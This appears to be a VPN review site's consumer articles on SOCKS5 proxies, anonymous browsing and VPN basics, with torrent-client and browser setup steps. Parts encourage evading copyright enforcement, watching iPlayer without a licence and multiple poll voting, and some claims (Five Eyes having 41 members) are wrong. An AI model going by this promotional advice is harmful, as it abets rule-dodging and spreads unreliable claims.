As mentioned before proxies don’t encrypt data like a VPN, which means you can access these services with very little slowdown. This is because there is no need to re-write header data. This, in turn, leads to less chance of errors, and fewer errors means more speed.

Although it doesn’t handle encryption, SOCKS5 does provide methods of authentication, as mentioned earlier. In general, a SOCKS5 handshake looks like this:

  1. The client sends a connection request, stating the list of authentication methods it supports.
  2. The server looks at these methods and chooses one. In the case that none are acceptable, it sends a failure response.
  3. Once accepted, information can pass between the client and server. The client can send a connection request and the server can respond.

This authentication removes many of the security concerns that plagued SOCKS4. The proxy isn't open to anybody with the details, resulting in less chance of malicious attacks. Usually, authentication comes in the form of a simple username and password combination. However, SOCKS5 also supports GSSAPI (Generic Security Services Application Program Interface) and IANA methods.

Why Would I Use a SOCKS5 Proxy?

Now that you know the features of SOCKS5 proxies, you may be wondering why you even need one. One of the main uses is to circumvent internet censorship. If your ISP blocks access to movie streaming websites, The Pirate Bay or other questionable content, a proxy will circumvent it. This can be useful on restricted networks. Work and school connections are often monitored and block access to social media, games, and anything else that isn’t relevant. Broad sweeping policies can often cause issues if you need to access one of those sites for research or you just want to slack.

You’ll also be able to access services that are limited to certain countries. BBC iPlayer, for example, is only available from a UK IP address. A proxy located in the UK would allow you to watch British TV without a TV license. This also applies to services like Netflix, which has significantly more content in the US region than others. Utilizing a SOCKS5 proxy from several different locations can significantly expand your viewing catalogue.

On home networks, users must be careful about their privacy, especially when torrenting. Using a SOCKS5 proxy can provide fast download speeds while adding a layer of protection against copyright holders. Many BitTorrent clients support a weak form of encryption when using SOCKS5, which prevents further obstacles.

SOCKS5 torrenting doesn’t offer the same protection as a VPN, but it’s better than nothing at all. In addition, it can give an obscured connection from only one application on your PC. As a result, you can perform fast P2P downloads while still using location services such as Google Maps. You’ll retain your normal download rate for any other browsing or streaming.

When to use SOCKS5 Proxies, VPNs or Both

For the privacy and security conscious, VPNs are a great option. They are superior to a SOCKS5 proxy in almost every way. The Best VPN Service Providers give unparalleled protection from government agencies, copyright holders and hackers. Many of them even provide proxy services as a free add-on. Other than speed, VPNs do everything SOCKS5 does and more. However, VPN subscriptions can be more expensive and require extra setup to run. In some situations, a proxy is the most economical option.

When it comes to accessing content with region restrictions, for example, a SOCKS5 proxy is great. You can easily spoof a different location, and don’t have to worry too much about security – repercussions are rare. You can find a proxy from almost every country on the planet, often free of charge. A VPN will provide the same benefit, but comes from a trusted provider who has put considerable thought into the safety and privacy of its users.

SOCKS5 proxies can hide your identity from web servers. Low stakes tasks like voting on polls multiple times from the same computer are fine. Most don’t make use of cookies or JavaScript to track the same browser across multiple IPs.

However, if you’re accessing blocked content, things are a little different. While a proxy is good for low stakes, it doesn’t remove identifying information other than the IP address. It’s open to snooping from anyone with access to your data stream, such as your ISP and government. Accessing censored file-sharing websites and other questionable content is best done through a VPN.

This lack of protection from those with network access can pose considerable risk in public. No encryption means little protection from prying eyes. On a WiFi hotspot, attackers can still see and interpret your data. Browsing websites without SSL encryption could result in password and information compromises. Furthermore, the previously mentioned security issues in SSL mean that hackers could get hold of it even then. For public WiFi safety, a VPN is the only true option.

Combine a SOCKS5 Proxy and a VPN

It’s clear that there are some merits to using a proxy over a VPN. The extra speed makes them suitable for a wide range of low-risk tasks. It’s advantageous to be able to utilize both a VPN and a SOCKS5 proxy. Thankfully, any of the Best VPN service providers supply this at no extra cost. Strong VPN is a great example of this. Switching the two methods in and out is a no-brainer, but what about using both at once?

Using both in tandem usually results in increased privacy, if it’s supported by your VPN provider. Be that as it may, the benefits are limited. If a VPN is connected already, you probably won’t see speed increases. Instead, the advantage comes as a safety net. If your VPN cuts out and the Kill-Switch fails, you still have some protection from SOCKS5 VPN proxy, and vice versa. This is relevant if a provider hands over your details – the copyright holder will only see the IP address of the other service. Using both creates an extra barrier to entry.

For most users, this extra barrier is far from essential. A properly configured VPN should pose little problem. However, if you’re doing something particularly sensitive the combination is a good option. For the best security, you should email your provider and make sure your SOCKS5 VPN proxy has no logs.

SOCKS5 Proxy vs VPN For Torrenting & P2P

Speaking of torrenting, it’s important to be aware of the benefits and limitations of using a VPN SOCKS5 proxy for it. SOCKS5 torrenting will show only the IP address of the proxy server if a media company is looking through a certain swarm and provides a small amount of encryption. This gives the small degree of protection mentioned earlier.

However, there are still many avenues of attacks for copyright holders. The encryption method torrent clients use is shaky and not reliable. It can be cracked quickly, revealing the information beneath. Although this wouldn’t reveal the user’s IP address, it could give information such as the version of the client, the operating system, settings and download speed. Copyright holders could use this to narrow down to an individual user and their ISP. They can then send a legal request to that ISP for information. The lack of proper encryption means the ISP can clearly see what a user is doing on its network.

SOCKS5 torrenting does provide an increase in speed, but it comes at a price. A determined copyright troll or government entity may still get leverage over the user. In the end, it’s up to the individual to decide if the speed increase is worth the risk. This will probably depend on how significant the difference is.

SOCKS5 VPN proxies come with an additional caveat. A fully-fledged VPN won’t just protect you from copyright holders, it will also bypass ISP throttling. It’s becoming increasingly common for service providers to set speed limits on peer-to-peer downloads, resulting in speeds that are as much as one fifth of normal speed. Service providers can only do this if they can interpret and categorize the data, so VPN encryption provides a natural wall.

Proxies do not generally provide encryption, and you may experience significant throttling. This can easily offset the speed gains of SOCKS5, so proxies are only the best option if your ISP does not throttle. You can test for throttling though web services like Glasnost. Even with the encryption built into torrent clients, most service providers can tell if you’re using P2P. If you’re unsure, you can always test with a free proxy.

Configuring SOCKS5 Proxy for Torrenting

Thankfully, setting up a SOCKS5 proxy for torrenting is very simple. It requires fewer steps than a VPN, and all you’ll need is a torrent client. In our examples, we’ll be showing uTorrent and qBittorrent, using a VPN SOCKS5 proxy from Strong VPN. Both providers give the functionality free of charge and provide a premium service and no logs policy.

Set up a SOCKS5 Proxy with IPVANISH and qBittorrent

To emphasise the divide between the two services, IP Vanish’s SOCKS5 details can’t be found in the regular VPN client. Instead, you’ll have to go to the My Account section of its website and click on the SOCKS5 Proxy tab.

ipvanish proxy settings

You’ll want to note down these credentials for use later. The username and password are specific to you, and provide the SOCKS5 authentication mentioned earlier. The hostname, ams.socks.ipvanish.com, is thanks to SOCKS5 and its Domain Name Resolution feature. If you’re using a different proxy, just take note of those details instead.

For an extensive review on Strong VPN, including security tests, DNS Leak tests, Torrent Protection, Kill-Switch test, Netflix support and much more, read our Best VPN Review: Strong VPN

Now, in qBittorrent, head to Tools > Options. On the left-hand side, you’ll see the Connection tab. Click it. You should be presented with the following menu:

qbittorrent settings

Under the Listening Port heading, disable Use UPnP/NAT-PMP port forwarding from my router. Then input the following details under Proxy Server:

  • Type: Socks5
  • Host: ams.socks.ipvanish.com
  • Port: 1080
  • Use proxy for peer connections: Yes
  • Disable connections not supported by proxies: Yes
  • Use proxy only for torrents: Yes
  • Authentication: Yes
    • Username: IP Vanish SOCKS5 generated username
    • Password: IP Vanish SOCKS5 generated password

qbittorrent SOCKS5 Proxy settings for Torrenting

For extra privacy, head to BitTorrent and change Encryption mode to Require encryption. This will force the in-application encryption discussed earlier. Also tick Enable anonymous mode. This will remove the peer ID from the client’s fingerprint and force all incoming connections through SOCKS5.

qbittorrent SOCKS5 Proxy settings for Torrenting

Finally, hit Apply and Okay. Restart qBittorrent just to be safe.

Set Up a SOCKS5 Proxy With Private Internet Access & uTorrent

Finding your SOCKS5 VPN proxy settings for Private Internet Access is equally simple. Go to the client sign in page and login with your username and password. Scroll down until you see a heading with the label PPTP/L2TP/SOCKS Username and Password. Click Generate Username and Password and note down the details:

pia vpn socks5 setup

The hostname isn’t listed here, but a support article reveals that it’s proxy-nl.privateinternetaccess.com.Write that down too, or the details of your free proxy. Launch uTorrent and go to Options > Preferences (Ctrl + P).

utorrent pia vpn socks5 settings

Under the Connection subheading, disable Enable UPnP port mapping and Enable NAT-PMP port mapping. Then enter the following settings under Proxy Server:

  • Type: SOCKS5
  • ·Proxy:
  • Port: 1080
  • Authentication: Yes
    • Username: PIA SOCKS5 user
    • Password: PIA SOCKS5 password
  • Use proxy for hostname lookups: Yes
  • Use proxy for peer-to-peer connections: Yes
  • Disable all local DNS lookups: Yes
  • Disable all features that leak identifying information: Yes
  • Disable connects unsupported by the proxy: Yes

utorrent pia vpn socks5 settings

To enable encryption, go to the BitTorrent subheading and look under the Protocol Encryption menu. Change Outgoing to Forced. Be aware that this could impair your ability to connect to peers. Click Apply and OK. SOCKS5 torrenting is now enabled.

Configuring Firefox and Chrome to Use SOCKS5 Proxy

Configuring your browser to use SOCKS can be a little more difficult. At this moment in time, neither Chrome nor Firefox support SOCKS5 with authentication by default. Instead, you can use the Maxthon browser. After install go to Settings > Advanced > Proxy Settings.

maxathon web browser socks5 settings

Now tick Use custom proxy setting and hit Manage Proxy. Click Add. Fill in the fields as follows:

  • Name: IPVanish SOCKS5
  • Type: SOCKS5
  • Address: ams.socks.ipvanish.com
  • Port: 1080
  • Username: IP Vanish SOCKS5 generated username
  • Password: IP Vanish SOCKS5 generated password

maxathon web browser IPVanish socks5 settings

Hit OK. Below the config, you’ll see a Bypass proxy server for heading. Here you can set exceptions for websites for which you need to keep your local IP, such as Google Maps. You can also switch this to Use proxy server for and only use the VPN SOCKS5 proxy on certain websites.

Free Proxy vs Paid

Though premium paid SOCKS5 proxies like the one above are often best, it’s possible to get one free of charge. Many websites even compile free proxy lists that are open for anyone to use. Here are just a few examples:

If you already have a VPN, you may have access to a free SOCKS5 proxy without even knowing it. It’s becoming increasingly common for the Best VPN service providers to offer this service. Some of the major ones include:

It may be tempting to just grab the first free SOCKS proxy you see, but there are a few things to consider. A free anonymous proxy isn’t going to be fast. It’s more common for download speeds to sit in the kilobytes rather than megabytes. You’ll also notice far less reliability, so you’ll probably have to switch between different servers for long downloads. This unreliability extends to response time.

In addition, a free anonymous proxy often lacks security. In many cases, they have no security at all, leaving users open to hackers. In many cases free providers keep logs, which may cause issues for P2P downloads and other illegal activities.

In all, you’ll be hard pressed to find a good, reliable free proxy. If you want to protect your identity, paying is almost essential. In some cases, you can pick up a full VPN service for the same price or less than premium SOCKS5 services, making it a no-brainer. You’ll have access to strong encryption when you need it, and a proxy when you’re just looking for speed.

Using SOCKS5 Proxy For US Netflix

One of the best uses of a SOCKS5 proxy is for Netflix. The catalogue of the service has been limited of late, and people outside the US seem to be particularly affected. Thankfully, you can trick Netflix into giving you shows from regions across the world. Here’s my Netflix UK homepage before using a proxy:

Netflix UK homepage without SOCK5 proxy

In this example, we’ll be using Firefox. Go to the flyout menu on the top right, then select Options. Go to Advanced and click the Network tab. Under Connection > Configure how Firefox connects to the Internet, click Settings…

firefox socks5 settings for netflix

First, change Configure Proxies to Access the Internet to Manual proxy configuration. Under SOCKS Host enter the URL or IP address of your proxy server. Under Port, enter the number your Netflix SOCKS5 proxy has provided. Tick SOCKS v5 and Proxy DNS when using SOCKS v5.

netflix us homepage after socks5 configuration

You can now click OK and head to https://netflix.com. You should immediately notice a change in your browsing catalogue.

Unfortunately, those with a free SOCKS proxy may get stuck here. Netflix monitors proxy lists and blocks them to stop users accessing content they aren’t supposed to. You’ll know if you receive the following error when trying to play a show:

Trying to access Netflix US via Free SOCKS Proxy fails

Trying to access Netflix US via Free SOCKS Proxy fails

You may be able to find a free proxy that Netflix hasn’t gotten around to yet, but it’s quite unlikely. A paid, private SOCKS5 proxy is less likely to be blocked, as the provider changes things often. You should notice much faster buffering times, so it’s worth paying the small monthly fee.

Most VPN SOCKS5 proxies use authentication, which isn’t supported by Firefox or Google Chrome. Instead, you’ll want to use the previously mentioned Maxthon browser method. This should give you fast, unblocked access to different films.

Summary

While SOCKS5 proxies offer better protection than HTML or nothing at all, they don’t shield the user from spying by ISPs or government. Free anonymous proxies offer even less protection, and can be open to hackers, cut out, or have slow download speeds. However, subscription-based proxies remain a great way to bypass regional blocks and carry out other, low-risk tasks.

Unfortunately, the price of a standalone SOCKS5 proxy is high compared to other services. In many cases, users can get a VPN subscription from STRONGVPN, Private Internet Access or NordVPN and a VPN SOCKS5 proxy for the same monthly fee. This gives users access to the full, hardened security of a VPN, while also providing a fast, less secure proxy if they need it.

  • Hits: 838553

Anonymous Browsing – Internet Privacy. Securing Your Online Privacy The Right Way

anonymous browsing secure your online identityDespite what some think, the internet is not private. Anonymous browsing and Internet Privacy are almost non-existent in today's online world. Websites collect personal information on every visit without your knowledge. Despite the free label, services come at a cost, and in many cases, it’s a lack of privacy.

The primary driver is the advertising industry. Most websites get paid if an ad is clicked or the product is purchased, not just for exposure. As a result, they want promotions that are relevant to the user. They get paid, and the user gets to see the products they’re interested in. It seems advantageous to both parties.

However, to target these ads, agencies need information about a website’s users. Companies like Facebook embed trackers across the web to build a detailed profile of individuals. This includes things like your gender, age, location, and websites you frequent. Information from multiple ad agencies can then be combined to build a detailed picture of your interests and personality.

firefox lightbeam plugin

Firefox's Lightbeam Plugin provides a visual map of sites visited during our session

Here’s the result of two hours of browsing activity with the Lightbeam plugin. The circle articles are sites we visited, while the triangles are third parties. Together, they can create an interconnected web of information. Visiting just 32 sites fed 371 third parties data!

They can do this across the web through identifying information like your IP address. When you connect to a network, your device is given a unique string of numbers by the ISP or mobile service provider. These can be cross-referenced across the internet to find your browsing habits.

If that’s not enough, there are also government agencies to worry about. IP addresses usually give websites a rough idea of your location by pointing to your service provider. That’s not a barrier for government. They can ask the ISP who the IP was assigned to and find your name and address. You would think that such power would be used sparingly, but unfortunately, it’s not.

Former NSA contractor Edward Snowden revealed that major powers are spying on citizens across the world on an unprecedented level. Authorities request all that tracking data we mentioned earlier and combine it with information from the internet service provider (ISP). From 2011-2012, Australian agencies requested ISP logs over 300,000 times. This can include every website the user has visited over a period of years.

And that’s someone who has the country’s best interests at heart. This kind of information is also accessible to a number of people who work for the ISP. Earlier this year, an ex-technician for Verizon pleaded guilty to selling phone call and location information to a private investigator. Web browsing information could equally be sold off to the highest bidder.

And that’s assuming they even have to buy it in the first place. In 2012, internet activist group anonymous hacked into the servers of telecommunications company AAPT. They stole over 40GB of information relating to business customers to show that the logs are not always safe. A redacted copy of the data was later published online.

What is the Threat?

With so many parties interested in such data, anonymous browsing is becoming difficult. The sad fact is that without protection from the Best VPN providers, you aren’t truly safe.

Firstly, there’s the threat of this information falling into the hands of hackers. Imagine a person with malicious intent having a record of your name, address, interests, habits, and every website you’ve been to. It could easily be used to blackmail someone or make threats to their friends and family.

It can also be used to identify potential weak points in your security. For example, if you regularly visit an insecure site, it could be hacked with an end goal of getting to you. Tools such as a key logger could then be used to collect usernames, passwords, and credit card data.

Furthermore, such access can be used for types of identity theft. Combined with an email account, an attacker has access to basically everything. Password resets for various accounts, name, age, date of birth. Bank details can be used to place illegal purchases on your behalf or commit fraud. Most of our lives are stored online, and the attack could gain access to all of it.

The same methods can be used by authorities in oppressive regimes. Even if the current government protects its citizens from such things, a power shift could change that. Because tracking information and ISP logs are kept for a long time, the data will still be around years into the future.

Then there’s the issue of illegal activities. Previously, nobody would know if you were breaking the law in the privacy of your own home. However, with the increase in logs, activities like torrenting can result in warnings, loss of service, or huge fines.

Without a VPN, torrents can be traced straight back to the user. Copyright holders hire companies to search through swarms of people torrenting their property. With an IP address, they can request a user’s details from the ISP and pursue legal action. The ISP is often compelled to do this or face legal repercussions themselves.

Though torrenting is a morally grey area, this can also affect customers who have done nothing wrong. WiFi networks can be hacked or information can be incorrect. In 2010, 53-year-old Cathi Paradiso ran into this problem when she was accused of downloading 18 films and TV shows illegally. In reality, her IP address was identified incorrectly, and her internet access cut off unjustly. It’s clear that even if you’re a regular internet user, anonymous browsing has its benefits.

What Is Anonymous Browsing & How Does it Help?

Anonymous browsing is usually achieved by routing a normal internet connection through a virtual private network. We won’t go into too much detail here, as it’s been already covered in our Beginner’s Guide to VPNs.

However, it’s important to have a basic idea of how a VPN can provide anonymous browsing. A VPN uses a method called tunnelling to wrap the data packets you send to your ISP in encryption. Various methods such OpenVPN, L2TP, PPTP and STTP are used to achieve this. Through a VPN, your information goes from clear and readable to a string of random letters and numbers.

As a result, those trying to grab the data in transit get a useless pile of text. They don’t have the cypher, so they can’t unlock it. This is particularly useful on public WiFi, where hackers can often see what you are doing and perform attacks.

It also has the knock-on effect of hiding your IP address. The connection goes through the servers of the VPN provider, where’s its assigned an anonymous IP from the server. Unlike ISPs, the best VPNs don’t keep logs. The original IP address can’t be compelled by third-parties, and the user can surf anonymously.

However, this anonymous browsing doesn’t always extend to web trackers. Various methods can allow them to grab identifying information like IP addresses despite a VPN connection. Thankfully, many of the providers have built-in protection for this. Domain Name Server requests are routed through their servers and resolved by a special process that protects the user. As a result, malicious domains can’t find the user’s true identity.

How to Get VPN Services

Fortunately, it’s quite easy to browse anonymously via a VPN. There are thousands of different providers out there, each with different merits and price points. Some can even be used free of charge, but they can be subject to bandwidth caps and have been sold user data. For a premium and safe service, it’s always best to go with a paid provider.

We strongly recommend you examine StrongVPN - one of the most stable and fast VPN service providers globally.

Luckily, we have a round up all the best VPNs so that you don’t have to search through hundreds yourself. Our experts have rounded up all the major features of each, ranking them based on quality.

Once you have found one that meets your requirements, you’ll have to sign up. You usually need an email address, password, and a payment method. The privacy conscious can often use bitcoins or trade gift cards to protect their identity while paying.

That payment can be anywhere between $3-$8 per month, depending on provider. You usually get a better service the more you pay, but there are some exceptions. Either way, it’s a small price for anonymous browsing, whether you’re using a VPN to torrent, or just conscious about types of identity theft and government surveillance.

On sign up, you usually get an email with a username and password, as well as a link to the login page. Some providers will take care of this for you through a download link that incorporates sign-in details.

You then install the program, enter your details, and click connect. They have clients for all the major platforms, including Mac OSX, Windows, iOS, and Android. The Βest VPN providers have thousands of servers all over the world and can provide fast, anonymous browsing in a few minutes.

Some VPNs provide details for an additional SOCKS5 proxy, which you can read about here. This can provide anonymous browsing against web hosts, but not the ISP or government.

Best Practices For Enhanced Protection

Though VPNs are great for browsing anonymously, they aren’t infallible. There are many methods to get information, and the providers can’t protect against them all. For complete anonymity on the internet, you may want to take some additional steps.

Cookies & Browser History

One thing a VPN cannot control is the data that’s stored locally on your computer. As you browse the web, your computer keeps a record of the history so you can go back to it later. It also retains cookies, which will save your settings on various websites, and images, so that you don’t have to download them every time.

The implications of this are fairly straightforward. If somebody gets access to your computer, physically or remotely, they have tons of information about you. To avoid this, you’ll want to use the “Private Browsing” feature in your browser.

In Firefox, you can get there by hitting the fly out menu on the top right and pressing New Private Window. Alternatively, you can press Ctrl+Shift+P.

Anonymous browsing Firefox new private window

Anonymous browsing in Firefox- Enabling a new private window

The things you do in this session will not be recorded. That covers the pages you visit, cookies, searches, and temporary files. There’s also the option for tracking protection, which will block many of those third parties we talked about earlier. However, Firefox does keep downloads and bookmarks for later use.

firefox private browsing tracking protection

Mozilla also stresses that Private Browsing doesn’t necessarily mean anonymous browsing. By itself, this is no protection against the information ISPs and government agencies collect. You’ll still need a VPN for that.

Google Chrome users can make use of a similar feature, though it has a different name. Incognito mode provides much of the same functionality but doesn’t have tracking protection like Firefox. Its shortcut is also different, using Ctrl+Shift+N.

Anonymous browsing chrome incognito mode

Anonymous browsing chrome - Enabling a incognito mode window

Like Mozilla, Google stresses that Incognito mode does not provide anonymous browsing at work, home or any other location. Once more, files and bookmarks are still stored, so you have to be careful to delete those afterwards.

Other browsers have this functionality built in. In Internet Explorer and Edge, it’s called In Private Browsing/Window, with the same Ctrl+Shift+P shortcut as Firefox. Mac OSX users can use Private Browsing in Safari for the same effect.

Though they took a little while to catch up, most mobile browsers support it too. In Firefox, it’s called “New Private Tab” while in Chrome it's “New incognito tab”. Most Android stock browsers also support private browsing, though there are a few exceptions.

Enabling safe private browsing in Firefox, Chrome and Android O/S

Enabling safe private browsing in Firefox, Chrome and Android O/S

The Safari browser on iOS also supports anonymous browsing. It can be found by hitting the icon, tapping Private, and then Done. This applies to iPads, iPods, iPhones, and most other Apple devices.

Safari Web Browser - Private Mode

Safari Web Browser - Private Mode

Web Trackers & Encryption

Unfortunately, Firefox is the only one of these browsers that fights tracking. We highly recommend using Firefox if you are privacy conscious, but sometimes that’s not possible. For enhanced anonymous browsing, you should consider using browser plugins on Chrome, Firefox, or Edge.

Privacy Badger

Privacy Badger is an extension created and managed by the Electronic Frontier Foundation (EFF). It stops third-party trackers from following you across the web. Based on smart algorithms and policies, it brings protection to windows that aren’t private browsing. It’s also a little more advanced than Firefox’s methods.

 Privacy Badger Help Enforce Anonymous Browsing

Privacy Badger Help Enforce Anonymous Browsing

However, Privacy Badger can prevent some functions like sharing articles to Facebook. Thankfully, EFF has built a simple slider system that lets you turn trackers on and off at will. Green means the tracker is third-party but isn’t following you across the web, so it’s allowed. Red means it has been completely blocked. Yellow means the tracker is necessary for web browsing, but it’s cookies have been blocked.

There is one caveat. Privacy Badger blocks third-party trackers, but it doesn’t stop tracking from the first party websites.

 firefox-lightbeam

Referring to our diagram, it blocks all the little triangles, but not the large circles. If you frequently visit a website, they may still collect information. You should still be using a VPN if you want to surf anonymously.

uBlock Origin

As well as Privacy Badger, you may want to consider an Ad-Blocker. uBlock Origin has a dual purpose, blocking trackers and malware as well as advertisements. It’s compatible with Privacy Badger, so you can use both at the same time.

What’s more, uBlock protects against WebRTC leaks. WebRTC is a communications protocol that lets you share files and video in real-time without the need for plugins. Unfortunately, it can also reveal a user’s true IP address, even if they’re using a VPN.

You can enable protection in uBlock Origin by hitting the settings tab. Under the Settings tab, you’ll see an option named Prevent WebRTC from leaking local IP addresses. Hit the checkbox and you’re done:

 uBlock Origin - Protection Against Malware, Trackers & WebRTC

uBlock Origin - Protection Against Malware, Trackers & WebRTC

It’s worth noting that this feature won’t provide anonymous browsing if you aren’t using a VPN. It only hides your local IP address, so the IP of non-VPN users will be visible.

HTTPS Encryption

You should also be forcing a HTTPS connection wherever possible. HTTPS provides SSL encryption, which makes it harder for attackers to intercept your communications. This is particularly important if you’re using public WiFi. Visiting a HTTP website lets attackers packet sniff and spy on what you are doing. This can lead to the capture of passwords, bank details, or personal information.

Though using a VPN will protect you from this, it never hurts to have an extra layer of protection. Before the initial connection of a VPN there’s a small window where you are connected to WiFi, but not to the VPN. It can also be a problem if your VPN cuts out and you don’t a backup.

Though HTTPS is rapidly spreading, the implementation is still limited on many websites. Visiting the site from a link with “http://” in front often takes users to the unencrypted version. This can be a major problem if the site links back to itself this way.

Thankfully, EFF has a solution once more. HTTPS Everywhere forces SSL encryption no matter what link you click. It uses “clever technology” to rewrite requests into a HTTPS format and prevent interception.

Though HTTPS Everywhere can’t help when sites don’t support SSL at all, it does create a more consistent experience on those that do. It will also warn you when portions of a website can’t be encrypted, such as images. When you’re on Public WiFi, you can additionally choose to block all HTTP sites.

By itself, HTTPS Everywhere does not provide anonymous browsing. An interested party will still be able to see what web pages you are accessing. However, on sites that support SSL, it will stop people on the same network seeing specifics.

The Tor Browser

Finally, the extra conscious can use Tor to protect their identity. The Tor Browser bundles several add-ons into its core, including NoScript, an extension that blocks JavaScript, Flash and Java tracking. It also incorporates HTTPS Everywhere for added protection.

However, Tor’s main privacy feature is its underlying protocols. Communication in Tor is layered in encryption. Data sent through the browser goes through another user’s computer, each decrypting a small chunk. Each link in the chain only knows the IP address of the computer before it, so the user can surf anonymously.

Though Tor has some security issues, it can be used on top of a VPN to provide an extra barrier for attackers or law enforcement to get through. It’s not a substitute for a paid VPN, but it does provide considerable protection over regular browsing.

Mobile Devices

On mobile devices, anonymous browsing can be harder to achieve. If you don’t want to be tracked across the web, you may have to change your browser.

Unlike Firefox, Chrome does not support extensions on mobile. This means the aforementioned addons can’t be installed. To surf anonymously, you should be using Firefox or a dedicated privacy browser.

Users of Mozilla’s browser can go to addons.mozilla.org/android and pick up HTTPS Everywhere, uBlock, and Privacy Badger just like on desktop. They require no additional permissions and work just as well.

If you don’t like Firefox, there’s still a few options:

  • Ghostery Browser (Android, iOS)– inbuilt tracking protection and other privacy features.
  • Brave Browser (Android, iOS) – inbuilt Adblock, tracker protection, HTTPS Everywhere, Script blocking, and tracker blocking.
  • Orfox (Android) – Official Tor-based browser with NoScript and HTTPS Everywhere, automatic history and cookie deletion. Removes permission requests for Contacts, Camera, Microsoft, Location and NFC. Removes WebRTC.
  • Onion Browser (iOS) – Unofficial, open source Tor browser. NoScript-like mode and user-agent spoofing.

Despite these methods, it’s important to realise that mobile devices are not a substitute for desktop when it comes to anonymous browsing. By default, phones have far more in-built tracking, from location services, cell towers, and more. If you’re doing something questionable, it's best to stick to a PC.

Summary

The bottom line is that though you can add protection free of charge, it wont give fully anonymous browsing like a VPN. Though uBlock and Privacy Badger protect against web tracking, they do nothing to stop spying by ISPs or government agencies.

A VPN can protect users against web tracking, ISP tracking, government spying, and man-in-the-middle attacks. They are low-cost, easy to implement, and allow a fast browsing experience, unlike Tor. Though they aren’t perfect, extra precautions make them as close to it as possible. VPNs are therefore the natural solution for anonymous surfing at work, on public WiFi, or at home.

  • Hits: 17097

What is a VPN? VPNs for Beginners - Everything You Need to Know About VPNs, Anonymous Browsing, Torrenting & VPN Security Features

What is a VPN?

VPN Guide for beginners - What is a VPN?VPN (Virtual Private Network) is a well-known acronym amongst regular internet users. Initially used within businesses to securely connect to the corporate network, nowadays it’s being used by almost any type of user for anonymous browsing, protecting their privacy and stopping ISPs and government agencies tracking their online activities and transactions who are looking to capture users performing illegal file sharing of movies, music albums, torrenting or even trying to access geo-restricted content such as Netflix, Hulu and other streaming services.

With the exponential rise of internet security threats it doesn’t really matter what type of device you’re using - whether it’s a PC, MAC, tablet, iPhone, Android device or smartphone - the risk is the same. Every single one of these devices can be tracked and their precise location known without any effort.

For example, the screenshot below was taken from a mobile phone. It shows a website visited that is able to track the mobile device’s IP address (49.185.251.16) and retrieve a significant amount of information regarding its location. It’s detected the country (Australia), the state (VIC), City (Melbourne), ISP/Mobile carrier (Optus) plus location and geographic coordinates (latitude and longitude)!

Information captured on a non-VPN protected internet user

Information captured from a non-VPN internet user

As you can appreciate, the amount of information websites can capture is alarming. In a similar way ISPs, hackers and government agencies can intercept and capture traffic to and from a user’s mobile device or PC at home.

Now that we appreciate how exposed we really are, let’s take a look at how VPNs help protect our identity and personal information.

We highly recommend StrongVPN service provider - one of the worlds largest and most secure VPN providers.

Who Needs a VPN?

A VPN can offer a number of substantial advantages and, depending on your internet activities, can prove to be mandatory.

A VPN service will allow you to “hide” your physical location by masking the IP address assigned by your internet service provider (ISP). In addition, a VPN provides a basic level of security and confidentiality as all information to and from your computer or mobile device is encrypted. This prevents hackers or ISPs from monitoring your online activities.

Users typically require a VPN service for any of the following activities:

  • Hide your internet activities from your ISP and government. ISPs around the world unofficially monitor user traffic in order to intercept sensitive or top secret information. More than 41 countries are now members of the “Five Eyes” – a global intelligence alliance monitoring electronic information (email, faxes, web traffic etc) and private communication channels (VPNs). The National Security Agency (NSA) was uncovered spying on hundreds and thousands of VPN connections based on Cisco’s PIX Firewalls for over a decade thanks to a VPN exploit they discovered and was never shared with the public.
  • Accessing geo-restricted content. A prime explain is accessing US-based Netflix or Hulu when travelling overseas or accessing sites providing local online video/streaming, TV shows etc from anywhere around the world.
  • Bypassing web filters and accessing restricted websites or internet services such as online gaming, Skype, Dropbox, OneDrive etc. Recent bans by governments blocking popular Torrent sites such as ThePiratebay.org, TorrentHound, Torrentz, IsoHunt and others have pushed users to VPN services in order to access these sites and services without restriction.
  • Peer-to-Peer (P2P) file sharing. Usually blocked by firewalls or ISPs people are moving to VPN and ToR based networks in order to freely share data with each other without having to worry about being tracked or blocked.
  • Torrenting. A big topic indeed. While there are many torrents that are legally distributed e.g Linux ISO images, open-source applications and games, Torrent seeders and leechers are monitored by agencies acting on behalf of their clients MPAA (Motion Picture Association of America) & RIAA (Recording Industry Association of America) to protect their copyright materials. While these agencies monitor and stop illegal video/music downloading they have been found on many occasions to incorrectly accuse citizens of illegally downloading copyright content.
  • Avoid Bandwidth Throttling. ISPs are primarily responsible for this one. In order to save bandwidth they unofficially throttle torrent or other similar traffic, slowing download speeds considerably and sometimes to the point where users quit downloading. When it comes to VPN for Torrenting, P2P and File sharing users can avoid bandwidth throttling and in many cases increase their download speeds up to 3 times!
  • Accessing the internet from public WiFi hotspots. Using Public WiFi and Guest WiFi hotspots poses serious security threats. These are overcome with the usage of VPN services.

The TOR network is an alternative VPN solution used also by the Dark-Web. Readers interested on how TOR VPN works and compares against VPN can also check our TOR vs VPN article.

Accessing The Internet Without a VPN

Below is a diagram showing a typical user accessing the internet without a VPN. The user’s IP address is assigned by the ISP and is visible to the internet. Any online resource accessed by the user is completely visible to the ISP and anyone monitoring the user’s IP address:

Unencrypted internet traffic is visible and easily monitored 

Unencrypted internet traffic is visible and easily monitored

Of course resources such as Internet Banking usually encrypt the data transferred between the client and the server but the traffic source (user IP) and destination (server IP) are still fully visible. Similarly other activities such as Torrent Downloads are fully traceable back to the user.

It should also be noted that ISPs always keep log files of their users’ IP addresses. This means that the ISP is fully aware of the IP address assigned to each of its users. By law, these logs are stored for years and can be used as evidence in the event of a law suit or investigation. This applies to home and mobile users.

Using a VPN Service Provider Changes The Game

To use a VPN service provider you must first register with a VPN Service Provider of your choice. VPN subscriptions start from a low $3US - $8US per month making them affordable for any user. Once you’ve purchased a VPN subscription you are able to download and install the provided VPN Client on to your devices.

With the VPN Client you are able to connect to one of your VPN Provider’s servers, which are located in various countries. Once connected, a “tunnel” is created between your device and the VPN server and all traffic is redirected to the VPN server and from there to the internet.

Any traffic traversing the tunnel is protected via special encryption mechanisms. Traffic entering the tunnel is encrypted while traffic exiting the tunnel is decrypted.

This means that anyone monitoring your internet connection e.g ISP, Hacker or Government agency, is unable to see your internet activities. All they can see is your encrypted traffic to the VPN server you’re connected to.

 

A VPN helps protect and encrypt all traffic to and from the internet avoiding any monitoring

When casually accessing websites or other online services it is unlikely they’ll be able to track your identity unless they require you to authenticate. For example if you need to access your Gmail account then you’ll need to provide your username and password. As that point your identity is known to Google even though you’re connecting via VPN, however, Google won’t be able to track your real location thanks to the VPN.

